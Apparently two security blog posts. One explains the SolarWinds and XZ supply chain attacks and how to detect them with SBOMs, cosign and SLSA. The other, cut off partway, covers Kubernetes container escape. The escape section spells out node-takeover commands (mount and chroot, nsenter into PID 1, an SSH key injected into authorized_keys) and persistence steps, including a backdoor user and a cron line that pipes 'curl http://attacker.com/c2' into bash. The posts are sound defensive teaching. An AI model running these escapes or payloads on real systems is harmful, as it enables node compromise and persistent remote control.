│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘

Supply chain attack detection is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.

Two Incidents — Same Attack Surface

SolarWinds (December 2020)

The SolarWinds compromise is the definitive build-system attack. The timeline:

March 2020       Threat actor (UNC2452 / Cozy Bear) gains access to
                 SolarWinds build environment

October 2020     SUNBURST backdoor code inserted into SolarWinds Orion
                 build process — not into the source repository

October 2020     Orion 2019.4 through 2020.2.1 builds produced with
                 SUNBURST included — binaries digitally signed by
                 SolarWinds with their valid code-signing certificate

October–         SUNBURST distributed to ~18,000 customers via the
December 2020    legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach — reports to SolarWinds and CISA

What made detection almost impossible:

The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds’ legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it dormant for 12–14 days after installation, used legitimate SolarWinds API patterns to blend with normal Orion traffic, and used legitimate cloud infrastructure (Avsvmcloud.com, which resolved to valid cloud provider IPs) for command-and-control.

The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.

The attack vector was the build system, not source code. SolarWinds source repositories did not contain SUNBURST. The attacker modified the compiled output at build time. A code review of the SolarWinds source would have found nothing.

XZ Utils (CVE-2024-3094, March 2024)

The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.

Timeline:

November 2021    GitHub user "Jia Tan" (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils,
                 builds trust with maintainer Lasse Collin, is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity, coordinates social
                 pressure on Lasse Collin from other fake personas to
                 push releases faster

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             500ms SSH connection delay on his Debian sid machine
                 while running unrelated Valgrind benchmarks

March 29, 2024   Freund traces the delay with strace, finds sshd making
                 unexpected calls into liblzma, reports to oss-security
                 mailing list

March 30, 2024   CISA advisory published. Fedora 40 beta, Debian unstable,
                 openSUSE Tumbleweed had all shipped the affected version.
                 Ubuntu 24.04 LTS was in freeze and had it staged.

What was backdoored and how:

xz-utils provides the liblzma compression library. On systemd-based Linux distributions, sshd links against libsystemd, which links against liblzma. The backdoor hooked into sshd‘s RSA key processing — specifically RSA_public_decrypt — to allow authentication bypass using a specific attacker-controlled private key.

The backdoor was not in the git repository. It was injected during the tarball release process via obfuscated test files in the repository that were assembled and compiled during the build. Comparing the released tarball to the git tree reveals extra files and code that do not appear in any git commit:

xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

# How Andres Freund found it
# He was running sshd benchmarks and noticed unexpected latency
strace -p $(pgrep sshd) 2>&1 | head -20
# Saw unexpected calls into liblzma that should not be there
# Normal sshd does not call into liblzma at all

# Verify tarball vs git diff (the forensic check)
# If you have both the tarball and git source:
tar xf xz-5.6.1.tar.gz
git clone https://github.com/tukaani-project/xz.git xz-git
diff -r xz-5.6.1/ xz-git/
# Extra files in the tarball that don't appear in git = compromise indicator

What makes this attack class so dangerous:

The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan’s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund’s discovery.

Red Phase: How Supply Chain Attacks Work in Practice

There are three distinct attack surfaces. They require different defenses and catch different attack classes.

1. Build System Compromise (SolarWinds Model)

The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.

What makes it hard to catch: legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.

Simulation (safe to run in a test environment):

# Understand your build artifact's provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq '.[0].Config.Labels'
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# If -trimpath was used during build, some info may be stripped

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.buildType'

2. Dependency Hijacking: Typosquatting and Dependency Confusion

Typosquatting: a malicious package on PyPI/npm with a name close to a popular package (requets vs requests, djano vs django). Developers with a typo in their requirements.txt install the malicious package.

Dependency confusion: a private internal package (mycompany-utils) has the same name as a package you upload to the public registry with a higher version number. Package managers that check public registries before private ones will resolve the public (malicious) version.

# Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2>/dev/null
# If it returns versions and you didn't publish it there = confusion risk

# For npm: check if your scoped package exists on the public registry
npm view @your-scope/your-package version 2>/dev/null
# An unscoped internal package with a public registry hit = confusion risk

# For pip: audit your requirements for known-bad packages
pip-audit --requirement requirements.txt
# pip-audit checks against the OSV vulnerability database
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# 'npm audit signatures' verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads

The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.

What you can check:

# Verify a PyPI package hash matches what's listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
cosign verify \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow

Blue Phase: Detection

SLSA: What Level Your Pipeline Should Be At

SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. Four levels:

SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted, version-controlled build platform
              (GitHub Actions, GitLab CI) — provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hermetic builds — the build environment is isolated from
              the network, cannot pull external resources at build time
              Provenance is non-forgeable
              Catches: build-time dependency injection, most CI/CD attacks

SLSA Level 4  (deprecated in SLSA v1.0, merged into L3)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3 is where SolarWinds-class attacks become detectable.

Container Image Signing with Sigstore/cosign

# Sign a container image after build (in CI, using OIDC — no stored key)
# This runs inside GitHub Actions after the docker push step
cosign sign \
  --yes \
  ghcr.io/your-org/your-image:${GITHUB_SHA}
# cosign uses the GitHub Actions OIDC token to sign — no private key needed
# The signature is stored in the registry alongside the image

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity="https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq '.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }'
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)

SBOM Generation and Vulnerability Scanning

An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer “are we affected by the XZ backdoor?” across your fleet in under an hour.

# Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json > sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
cat sbom.json | jq '.components[] | select(.name == "xz-libs") | {name, version, purl}'
# Example output:
# {
#   "name": "xz-libs",
#   "version": "5.4.4-1.el9",    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   "purl": "pkg:rpm/redhat/[email protected]?arch=x86_64"
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype's vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical

Build Provenance with GitHub Actions (SLSA Level 2/3)

# .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: ["v*"]

permissions:
  contents: write
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry

# Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow

What Anomaly Detection Catches

Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn’t been classified yet:

Unexpected external connections during build: a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time
Artifact hash drift: if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed
New dependency additions without PR: any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible

# Check for unexpected network connections during a build
# Run this on the build host during a CI job
ss -tnp | grep -E "(ESTABLISHED|SYN_SENT)"
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:<first-build-digest>
docker pull ghcr.io/your-org/your-image@sha256:<second-build-digest>
# If the digests differ for the same source commit, investigate

Purple Phase: Structural Fixes

1. Pin Dependencies with Hashes — Not Just Versions

Version pinning (requests==2.31.0) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:

# requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing

# Generate hash-pinned requirements from a working environment
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output

For containers, pin base images by digest, not by tag:

# Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future

2. Private Artifact Registry — No Direct PyPI or npm in Production CI

A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:

Dependency confusion protection: your CI resolves mycompany-utils from your private registry first, never from public PyPI
Availability independence: a PyPI outage does not break your builds
Audit trail: every package version pulled in every build is logged
Policy enforcement: you can block packages with unacceptable licenses or CVE scores

# Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as environment variable
export PIP_INDEX_URL="https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/"
export PIP_TRUSTED_HOST="your-artifactory.company.com"
# No direct PyPI access — all packages go through your registry proxy

# For npm: configure registry in .npmrc
echo "registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/" > .npmrc
echo "always-auth=true" >> .npmrc

3. Reproducible Builds — Same Input Produces Same Output

Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.

This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.

# For Go: builds are reproducible by default in Go 1.13+
# Verify by building twice and comparing
go build -o binary-1 ./cmd/...
go build -o binary-2 ./cmd/...
sha256sum binary-1 binary-2
# Identical hashes = reproducible

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq '.[].Id'
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is

4. Separate Build and Release Environments

SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.

INSECURE:                           SECURE:

Build host ──▶ compile              Build host ──▶ compile
           ──▶ sign artifact                   ──▶ output unsigned artifact
           ──▶ publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──▶ verify artifact hash
                                                    ──▶ sign with HSM key
                                                    ──▶ publish signed artifact

In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.

5. SBOM in Every Release — Non-Negotiable

If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.

# Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.components[] | 
    select(.name == "xz-libs") | {name, version}'

⚠ Production Gotchas

Hash pinning breaks automated dependency update workflows. When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.

SLSA Level 3 requires hermetic builds — most teams are not ready. Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). Most existing CI pipelines fetch dependencies during the build step. Reaching SLSA Level 3 requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 as a 6-month target.

SBOMs without a query workflow are paperwork. Generating an SBOM with syft and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.

Cosign verify fails silently if no signature exists. By default, if an image has no cosign signature, cosign verify returns an error — which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.

Tarball vs git diff requires automation. Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like diffoscope can automate the comparison; integrating it into your package intake process is the structural fix.

Quick Reference

Attack Vector	Detection Signal	Fix
Build system compromise (SolarWinds)	Artifact hash drift; unexpected egress during build; tarball ≠ git diff	SLSA Level 3 hermetic builds; separate signing environment
Maintainer social engineering (XZ)	Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls	Reproducible builds; tarball verification in package intake
Dependency confusion	Package resolves from public registry instead of private	Private artifact registry with scoped package names
Typosquatting	`pip-audit` / `npm audit signatures` findings	Private registry; automated dependency scanning in CI
Unsigned container image	`cosign verify` fails; no attestation in registry	Sigstore/cosign in CI; fail-closed admission webhook

Key Takeaways

Supply chain attacks bypass perimeter security entirely — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve
SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds’ own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts
XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling — this was within days of the backdoor shipping in multiple stable Linux distribution releases
The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)
Start with what you can implement this week: pip-audit or npm audit signatures in CI, syft SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring

What’s Next

SolarWinds showed that attackers can own your build system and reach your customers’ production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.

Get EP10 in your inbox when it publishes → subscribe at linuxcent.com

Kubernetes Container Escape: Attack Paths and eBPF Detection

June 26, 2026 by Vamshi Krishna Santhapuri

Reading Time: 17 minutes

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host — two commands can produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. --privileged removes those boundaries — the kernel sees no difference between the container and the host
Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces nsenter and mount syscalls at the point of the kernel hook, not a process name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks --privileged, hostPID, hostNetwork, and mounts before a pod ever schedules
Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.

The Incident: –privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds --privileged: true to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The --privileged flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, two commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with mount, you can fix even the filesystem view.

Red Phase: The Three Escape Paths

Path 1: –privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled, nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.

The mechanism:

1. Attacker controls a container image
2. Image's entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker's process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else "" end),
     (if .spec.hostNetwork then "hostNetwork" else "" end)] |
    join(" / ")' | \
  grep -v "/$" | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
